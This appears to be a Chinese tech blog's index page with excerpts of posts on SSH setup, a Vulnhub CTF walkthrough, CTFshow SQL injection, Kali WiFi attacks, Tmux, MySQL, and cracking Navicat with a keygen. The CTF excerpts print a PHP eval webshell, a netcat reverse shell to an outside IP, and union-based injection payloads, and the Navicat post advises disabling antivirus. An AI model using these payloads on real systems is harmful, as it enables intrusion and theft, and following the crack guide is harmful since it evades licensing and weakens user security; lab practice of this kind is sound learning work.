linux开启ssh
1.查看是否安装了openssh-server执行命令:
1yum list installed | grep openssh-server
如果有openssh-server,则是已安装,如果没有则需要安装,执行安装命令:
1yum install openssh-server
2.打开sshd配置文件sshd_config执行命令:
1vim /etc/ssh/sshd_config
去掉监听端口、地址前的注释:
开启远程登录:
开启用户密码作为连接验证,保存退出
3.开启 sshd 服务执行命令:
1sudo service sshd start
停止SSH服务命令:
1service sshd stop
重启SSH服务命令:
1service sshd restart
4.设置SSH服务为开机启动。 输入命令:
12chkconfig sshd on若是chkconfig sshd off则禁止SSH开机启动
关闭开启之后linuxx子系统异常
在管理员权限下打开powershell,执行以下命令后重启电脑
1234# 启用适用于 Linux 的 Windows 子系统dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart# 启用虚拟机功能dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
Vulnhub靶场-JANGOW-1-0-1
发现靶机开启21端口和80端口,21端口可以考虑爆破,80端口访问+目录爆破 先访问网站看看
发现这些地方可以点击
发现注入点直接判断用户
直接上传webshell
1echo '<?php eval($_POST["hack"]);' > shell.php
蚁剑连接,在该目录下发现config.php文件,可以获取desafio02数据库的账号密码,经测试没啥用。
在下图目录中发现.backup文件,可以获取jangow01数据库的账号密码
因为网站使用的是php语言,所以写入一个php反弹shell文件(测试该靶机仅有443端口反弹shell):
1<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.23.156.244 443 >/tmp/f');?> #直接在本地写好,用蚁剑上传即可,我保存为test.php
kali监听443端口
1nc -lvp 443
...
Python requests 模块
Python requests 模块 导入 requests 包 import requests
发送请求 x = requests.get(‘https://www.runoob.com/')
返回网页内容 print(x.text)
属性或方法
说明
apparent_encoding
编码方式
close()
关闭与服务器的连接
content
返回响应的内容,以字节为单位
cookies
返回一个 CookieJar 对象,包含了从服务器发回的 cookie
elapsed
返回一个 timedelta 对象,包含了从发送请求到响应到达之间经过的时间量,可以用于测试响应速度。比如 r.elapsed.microseconds 表示响应到达需要多少微秒。
encoding
解码 r.text 的编码方式
headers
返回响应头,字典格式
history
返回包含请求历史的响应对象列表(url)
is_permanent_redirect
如果响应是永久重定向的 url,则返回 True,否则返回 False
is ...
CTFshow sql注入
web 171首先使用
11' --+
发现有回显
使用
11' order by 3--+
发现一共是3行
使用联合查询得到当前数据库的名字
11' union select 1,2,database()--+
爆表名:
1-1' union select 1,2,group_concat(table_name) FROM information_schema.tables where table_schema=database()--+
爆破列名:
11' union select 1,2,group_concat(column_name) FROM information_schema.columns where table_schema=database() and table_name='ctfshow_user'--+
爆破数据:
11' union select 1,2,group_concat(id,username,password) FROM ctfshow_user--+
...
kali WIFI攻击
无线渗透攻击准备工作 首先呢我们我们来看一下渗透之前需要准备的工具。
kali linux系统
监听网卡
aircark-ng套件
mdk3工具
fluxion工具
上面的这些准备工作需要特点注意的一点是这个监听网卡,注意在某宝购买的过程中一定要注意购买的网卡是否是双频,我在购买的时候没有注意,所以购买的是单频网卡也就是2.4G版本的,没有办法收到5G频段,现在家用主流的路由器基本上都是双频,所以只能攻击单频段的话通常会自动跳转到另一个频段导致无法抓取数据包。关于aircark-ng套件在kali是内置的,mdk3以及fluxion需要下载一下。
12apt-get install mdk3git clone https://github.com/FluxionNetwork/fluxion.git
无线攻击目前市面上主流路由器的加密方式是WPA2,是WPA的升级版,它们的区别是,WPA2使用更安全的加密技术AES ,因此比WPA更难破解,也更安全。 但是依旧会被攻击,本章节测试环境就是以WPA2加密的路由器进行的。说起无线局域网,不得不提及路由器的两个接口LAN ...
AWD新手入门WEB篇
Attack With Defence主机发现:12345678910111213141516171819202122232425262728293031323334import urllib.requestimport timeopener = urllib.request.build_opener()opener.addheaders = [('User-agent', 'Mozilla/49.0.2')]for n in range(1, 255): nb = str(n) target = 'http://192-168-1-' + nb + '.pvp1453.bugku.cn/' new = open('C:/Users/HP/Desktop/bugkuwz.txt', mode='a+', encoding='utf-8') new.write(target) new.write( ...
iWrite 不让粘贴的解决办法
iWrite 不让粘贴的解决办法打开写作界面,找到以下代码
点击event,找到倒数第三个函数,直接禁用,就可以粘贴了!
Tmux
一、Tmux 是什么?1.1 会话与进程命令行的典型使用方式是,打开一个终端窗口(terminal window,以下简称”窗口”),在里面输入命令。用户与计算机的这种临时的交互,称为一次”会话”(session) 。
会话的一个重要特点是,窗口与其中启动的进程是连在一起的。打开窗口,会话开始;关闭窗口,会话结束,会话内部的进程也会随之终止,不管有没有运行完。
一个典型的例子就是,SSH 登录远程计算机,打开一个远程窗口执行命令。这时,网络突然断线,再次登录的时候,是找不回上一次执行的命令的。因为上一次 SSH 会话已经终止了,里面的进程也随之消失了。
为了解决这个问题,会话与窗口可以”解绑”:窗口关闭时,会话并不终止,而是继续运行,等到以后需要的时候,再让会话”绑定”其他窗口。
1.2 Tmux 的作用Tmux 就是会话与窗口的”解绑”工具,将它们彻底分离。
(1)它允许在单个窗口中,同时访问多个会话。这对于同时运行多个命令行程序很有用。
(2) 它可以让新窗口”接入”已经存在的会话。
(3)它允许每个会话有多个连接窗口,因此可以多人实时共享会话。
(4)它还支持窗口任意的垂直和水 ...
MySQL 常用语法
一.DDL1.创建数据库1create database 数据库名称;
2.选择数据库语法1use 数据库名称;
3.显示数据库中所有表语法1show tables;
4.删除数据库语法1drop database 数据库名称;
5.创建表语法123456create table 表名(列名1 列的类型列名2 列的类型列名3 列的类型);
6.常用数据类型数值类型
SMALLINT
2 字节
(-32 768,32 767)
(0,65 535)
大整数值
MEDIUMINT
3 字节
(-8 388 608,8 388 607)
(0,16 777 215)
大整数值
INT或INTEGER
4 字节
(-2 147 483 648,2 147 483 647)
(0,4 294 967 295)
大整数值
BIGINT
8 字节
(-9 233 372 036 854 775 808,9 223 372 036 854 775 807)
(0,18 446 744 073 709 551 615)
极大整数值
FLOAT
4 字节
(-3.402 8 ...
Navicat Premium 16 下载与安装破解教程(详细教程)
前言本篇文章是基于 WIN10 操作系统下载与安装破解 Navicat;破解教程为使用注册机破解;Navicat 为付费软件,请支持正版
一.下载 NavicatNavicat 官网:www.navicat.com.cn/在产品中可以看到很多的产品,点击免费试用 Navicat Premium 即可,是一套多连数据库开发工具,其他的只能连接单一类型数据库
点击试用
选择系统直接下载
二.安装 Navicat安装很简单,只需选择路径安装就行
三.激活 Navicat1.获取注册机蓝奏云密码:a8a6
2.使用注册机注意:关闭网络,关闭所有杀毒软件,WIN10/11 系统需关闭 Windows Defender 的实时保护下载成功之后使用管理员身份打开注册机
设置安装路径,点击 Patch安装路径为Navicat安装路径
出现提示,点击是
生成许可证在 KeyGen 中选择软件,版本,语言后,点击 Generate,生成许可证
同时打开 Navicat Premium,点击注册
将生成的许可证复制到下图位置
手动激活点击激活后,会出现服务器不可用提示,点击手动激活
点击 ...
MYSQL 数据库安装与配置
MYSQL数据库配置下载下载地址
根据需求下载好文件
解压
配置环境变量记录下解压文件的地址
点击设置->系统->高级系统设置->环境变量
新建,设置环境变量
点击下面的Path,新增以下变量:
配置my.ini在解压目录下新建my.ini
输入以下内容:
1234567[mysql]default-character-set=utf8[mysqld]character-set-server=utf8default-storage-engine=INNODBsql_mode=STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION
运行以管理员身份打开CMD
输入:
1mysqld --initialize-insecure
若执行命令成功会在解压目录下生成data的文件夹,若失败请将my.ini文件放入bin目录下再运行
注册服务CMD中输入 mysqld -insta ...